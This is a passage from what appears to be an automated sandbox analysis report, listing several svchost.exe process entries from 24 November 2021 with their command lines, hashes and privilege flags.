                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Start time:16:49:35
                                                                                                          Start date:24/11/2021
                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                          Imagebase:0x7ff6b7590000
                                                                                                          File size:51288 bytes
                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Start time:16:49:45
                                                                                                          Start date:24/11/2021
                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                          Imagebase:0x7ff6b7590000
                                                                                                          File size:51288 bytes
                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Start time:16:50:11
                                                                                                          Start date:24/11/2021
                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                          Imagebase:0x7ff6b7590000
                                                                                                          File size:51288 bytes
                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          Disassembly

                                                                                                          Code Analysis

                                                                                                          Reset < >